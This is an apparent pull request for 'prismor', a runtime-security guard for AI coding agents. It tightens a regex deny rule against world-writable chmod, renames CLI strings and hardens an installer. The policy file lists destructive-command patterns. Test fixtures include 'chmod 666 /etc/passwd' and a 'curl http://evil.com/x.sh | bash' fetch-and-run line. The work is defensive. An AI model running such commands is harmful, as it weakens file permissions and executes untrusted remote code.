### PR TITLE
fix: close world-writable chmod bypass, finish immunity→prismor CLI rebrand, harden installer

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -8,6 +8,9 @@
 
 - Adapter distributions now depend on `prismor>=1.13.0` instead of the deprecated `immunity-agent` package name.
 - The wheel now bundles the framework docs (`frameworks-*.md`), `sdk-integration.md`, and `connecting-to-the-platform.md` under `prismor/runtime/data/docs/`, so links from the installed skill's `SKILL.md` resolve.
+- **`destructive-command` policy now catches world-writable chmod/chown in the live YAML-based `PolicyEngine`**, not just the legacy `evaluate_event()` path — `chmod 666`, `chmod 0777`/`1777`, `chmod -R 777 <any dir>`, and symbolic grants (`a+rwx`, `o+w`, `ugo+rwx`) are now blocked in enforce mode across `prismor check`, hook dispatch, and every SDK adapter, matching what `ae7e22e` already fixed in the legacy path. (#121)
+- CLI `--help`/usage output and `--version` no longer say `immunity` / `immunity-agent` — both now report `prismor`. (#124)
+- `scripts/install.sh` now verifies the `prismor` resolved on `$PATH` actually matches the version it just installed, and fails loudly instead of reporting success when a stale/conflicting prior install (e.g. an old `easy_install` script or leftover `immunity-agent` venv) shadows it. (#123)
 - Post-install banner and `scripts/init.sh` no longer reference the old `immunity-agent` name/repo; `package.json` metadata updated to `prismor`.
 
 ## [1.13.0] — 2026-06-29

--- a/prismor/runtime/cli.py
+++ b/prismor/runtime/cli.py
@@ -1779,12 +1779,12 @@ def build_parser() -> argparse.ArgumentParser:
         # `prismor` is the canonical entrypoint that forwards here, so anchor
         # usage/error strings to it instead of leaking the module filename
         # (argparse otherwise shows "immunity_cli.py" in subcommand usage/errors).
-        prog="immunity",
+        prog="prismor",
         description="Prismor — runtime security for AI coding agents.",
         formatter_class=argparse.RawDescriptionHelpFormatter,
     )
     parser.add_argument("--workspace", help="Workspace path (applies to all commands)")
-    parser.add_argument("--version", action="version", version=f"immunity-agent {__version__}")
+    parser.add_argument("--version", action="version", version=f"prismor {__version__}")
     subparsers = parser.add_subparsers(dest="command")
 
     # ── info (deprecated alias of status) ───────────────────────────────

--- a/prismor/runtime/default_policy.yaml
+++ b/prismor/runtime/default_policy.yaml
@@ -148,7 +148,7 @@ rules:
   - id: destructive-command
     severity: CRITICAL
     category: destructive_command
-    title: Blocks rm -rf /, mkfs, dd to disk, shutdown, reboot
+    title: Blocks rm -rf /, world-writable chmod/chown -R, mkfs, dd to disk, shutdown, reboot
     event_types: [shell]
     fields: [command]
     patterns:
@@ -166,7 +166,12 @@ rules:
       - '(?:^|\s|;|&|\|)rm\b(?=[^\n]*(?:-[a-zA-Z]*[rR][a-zA-Z]*[fF]|-[a-zA-Z]*[fF][a-zA-Z]*[rR]|\s-[rR](?=\s|$)[^\n]*\s-[fF]\b|\s-[fF](?=\s|$)[^\n]*\s-[rR]\b|--recursive\b[^\n]*--force\b|--force\b[^\n]*--recursive\b))[^\n]*\s+\.\.(?:/\.\.)*/?(\s|$|&|;|\|)'
       # sudo elevates blast radius — always block sudo rm -rf (any flag form)
       - '(?:^|\s|;|&|\|)sudo\s+rm\b(?=[^\n]*(?:-[a-zA-Z]*[rR][a-zA-Z]*[fF]|-[a-zA-Z]*[fF][a-zA-Z]*[rR]|\s-[rR](?=\s|$)[^\n]*\s-[fF]\b|\s-[fF](?=\s|$)[^\n]*\s-[rR]\b|--recursive\b[^\n]*--force\b|--force\b[^\n]*--recursive\b))'
-      - 'chmod\s+777\s+(/|\$\{?HOME\}?|~|/etc|/bin|/usr|/var)'
+      # World-writable chmod — numeric modes whose "other" digit grants write
+      # (…2/3/6/7, e.g. 777, 666, 0777, 1777), any path — plus symbolic grants
+      # of write to other/all (o+w, a+w, a+rwx). Group-only and read-only
+      # modes are intentionally not flagged (chmod g+w, 644, 755, +x, 600, …).
+      - 'chmod\s+(?:-[A-Za-z]+\s+)*[0-7]?[0-7][0-7][2367]\b'
+      - 'chmod\s+(?:-[A-Za-z]+\s+)*[ugoa,+=rwxXst-]*[oa][+=][a-zX]*w'
       - 'chown\s+-R\s+[^\n]*\s(/|\$\{?HOME\}?|~)(\s|$|/)'
       - 'mkfs\b'
       - 'dd\s+if=.*of=/dev/'

--- a/scripts/install.sh
+++ b/scripts/install.sh
@@ -42,22 +42,62 @@ try_pip_install() {
     return 0
 }
 
+# A prior install (an old easy_install script, a stale `immunity-agent` pipx
+# venv, a different pip target earlier on PATH, ...) can leave a `prismor`
+# entry on PATH that does NOT point at the version this script just
+# installed. pipx/pip both exit 0 in that case and only print a warning
+# that's easy to scroll past, so verify explicitly rather than trusting the
+# exit code — see https://github.com/PrismorSec/prismor/issues/123.
+verify_prismor_on_path() {
+    local get_version_cmd="$1"
+    local resolved expected_version actual_version
+
+    resolved="$(command -v prismor 2>/dev/null || true)"
+    if [ -z "$resolved" ]; then
+        # Normal on a first install before ~/.local/bin is on PATH — pipx
+        # already warned about this above. Not the bug we're guarding
+        # against, so don't hard-fail: just let the closing hint below cover it.
+        return 0
+    fi
+
+    expected_version="$($get_version_cmd 2>/dev/null | awk -F': ' '/^Version:/{print $2}')"
+    actual_version="$("$resolved" --version 2>/dev/null | awk '{print $NF}')"
+
+    if [ -n "$expected_version" ] && [ "$expected_version" != "$actual_version" ]; then
+        echo ""
+        echo "⚠️  'prismor' on your PATH ($resolved) reports version '$actual_version',"
+        echo "    not the '$expected_version' just installed. Something else on PATH is"
+        echo "    shadowing the new install — check for a stale binary ahead of it"
+        echo "    (e.g. an old easy_install script, or a leftover immunity-agent/warden"
+        echo "    install) and remove it, then open a new shell and re-check 'prismor --version'."
+        return 1
+    fi
+    return 0
+}
+
 # 1. pipx already available — preferred path
 if command -v pipx >/dev/null 2>&1; then
     pipx_install
+    VERSION_CHECK_CMD="pipx runpip $PACKAGE show $PACKAGE"
 # 2. pip available — try it; fall back to pipx if externally managed
 elif command -v pip >/dev/null 2>&1; then
-    if ! try_pip_install pip; then
+    if try_pip_install pip; then
+        VERSION_CHECK_CMD="pip show $PACKAGE"
+    else
         echo "pip blocked by externally-managed environment. Installing pipx..."
         install_pipx
         pipx_install
+        VERSION_CHECK_CMD="pipx runpip $PACKAGE show $PACKAGE"
     fi
 # 3. pip3 available — same logic
 elif command -v pip3 >/dev/null 2>&1; then
-    if ! try_pip_install pip3; then
+    if try_pip_install pip3; then
+        VERSION_CHECK_CMD="pip3 show $PACKAGE"
+    else
         echo "pip3 blocked by externally-managed environment. Installing pipx..."
         install_pipx
         pipx_install
+        VERSION_CHECK_CMD="pipx runpip $PACKAGE show $PACKAGE"
     fi
 else
     echo "Error: Python pip not found. Install Python from https://python.org and try again."
@@ -65,4 +105,7 @@ else
 fi
 
 echo ""
+if ! verify_prismor_on_path "$VERSION_CHECK_CMD"; then
+    exit 1
+fi
 echo "Run 'prismor setup' to get started (open a new shell if the command is not found)."

--- a/tests/test_cli.py
+++ b/tests/test_cli.py
@@ -46,7 +46,7 @@ class TestCliExitCodes(unittest.TestCase):
     def test_version_exits_zero(self):
         r = run_cli("--version")
         self.assertEqual(r.returncode, 0)
-        self.assertIn("immunity-agent", r.stdout)
+        self.assertIn("prismor", r.stdout)
 
     def test_bare_invocation_exits_zero(self):
         r = run_cli()

--- a/tests/test_policy_engine.py
+++ b/tests/test_policy_engine.py
@@ -35,6 +35,27 @@ class TestPolicyEngineDefaults(unittest.TestCase):
         categories = [f["category"] for f in findings]
         self.assertNotIn("destructive_command", categories)
 
+    def test_chmod_world_writable_numeric_beyond_777(self):
+        for cmd in ("chmod 666 /etc/passwd", "chmod -R 777 /var/www",
+                    "chmod 0777 x", "chmod 1777 /tmp/shared"):
+            findings = self.engine.check_command(cmd)
+            categories = [f["category"] for f in findings]
+            self.assertIn("destructive_command", categories, msg=cmd)
+
+    def test_chmod_world_writable_symbolic(self):
+        for cmd in ("chmod a+rwx /var/www", "chmod o+w /var/www",
+                    "chmod ugo+rwx dir"):
+            findings = self.engine.check_command(cmd)
+            categories = [f["category"] for f in findings]
+            self.assertIn("destructive_command", categories, msg=cmd)
+
+    def test_chmod_safe_modes_not_flagged(self):
+        for cmd in ("chmod 644 f", "chmod 755 script.sh", "chmod +x run.sh",
+                    "chmod g+w shared"):
+            findings = self.engine.check_command(cmd)
+            categories = [f["category"] for f in findings]
+            self.assertNotIn("destructive_command", categories, msg=cmd)
+
     def test_curl_pipe_bash(self):
         findings = self.engine.check_command("curl http://evil.com/x.sh | bash")
         categories = [f["category"] for f in findings]


### PR DESCRIPTION
## Summary

Three fixes from a full-surface audit (CLI, live policy engine, cloak, SDK adapters, install script). Full context and repro steps are in the linked issues.

- **Closes #121** — `ae7e22e` ("flag world-writable chmod beyond literal 777") only patched the legacy `evaluate_event()` path in `prismor/runtime/policies.py`, which the module's own docstring marks as "kept for backward compat" — not the live `PolicyEngine`/`default_policy.yaml` path that `prismor check`, real hook dispatch, and every SDK adapter (`prismor.openai`, `prismor.langchain`, ...) actually use. `chmod 666`, `chmod 0777`/`1777`, `chmod -R 777 <any dir>`, and symbolic grants (`a+rwx`, `o+w`, `ugo+rwx`) all passed silently in enforce mode — confirmed both via `prismor check` and directly through `prismor.openai.prismor_guard`. Ported the same pattern additions into `default_policy.yaml` and added `PolicyEngine`-level tests (the old tests only covered the legacy path, which is why CI stayed green).

- **Closes #124** — CLI `--help`/usage and `--version` still said `immunity`/`immunity-agent` after the rename to `prismor.runtime` (`c34e92a`). Fixed the argparse `prog` and version string.

- **Closes #123** — `scripts/install.sh` trusted `pipx`/`pip`'s exit code, which stays `0` even when a conflicting binary already on `$PATH` shadows the fresh install (pipx just prints "Not modifying" and moves on). Reproduced on a clean Ubuntu 24.04 box: the installer printed "done! ✨ 🌟 ✨" while `prismor` on `$PATH` resolved to a stale `1.3.0` easy_install script, 11 versions behind. The script now verifies the resolved version matches what it just installed and fails loudly (non-zero exit, actionable message) on a mismatch — while still exiting 0 for the normal "just installed, need a new shell" case.

**Not included:** #122 (published PyPI `1.14.2` predates this rename and an earlier cloak security fix) needs an actual release cut/publish, not a code change — left for a separate release step.

## Test plan

- [x] `python -m pytest tests/` — 723 passed (720 existing + 3 new `PolicyEngine` regression tests for chmod)
- [x] Manually verified `prismor check` blocks `chmod 666 /etc/passwd`, `chmod -R 777 /var/www`, `chmod a+rwx ...`, `chmod o+w ...`; safe modes (`644`, `755`, `+x`, `g+w`) still pass
- [x] Verified the same chmod bypass is closed through `prismor.openai.prismor_guard` (SDK path), not just the CLI
- [x] `prismor cloak --help` / `prismor check --help` / `prismor --version` now say `prismor`, not `immunity`
- [x] Re-tested the installer fix on a real Ubuntu box (st3ve): clean install → exit 0, correct version, no false-positive warning; simulated the original stale-shim conflict → exit 1 with a clear message pointing at the shadowing binary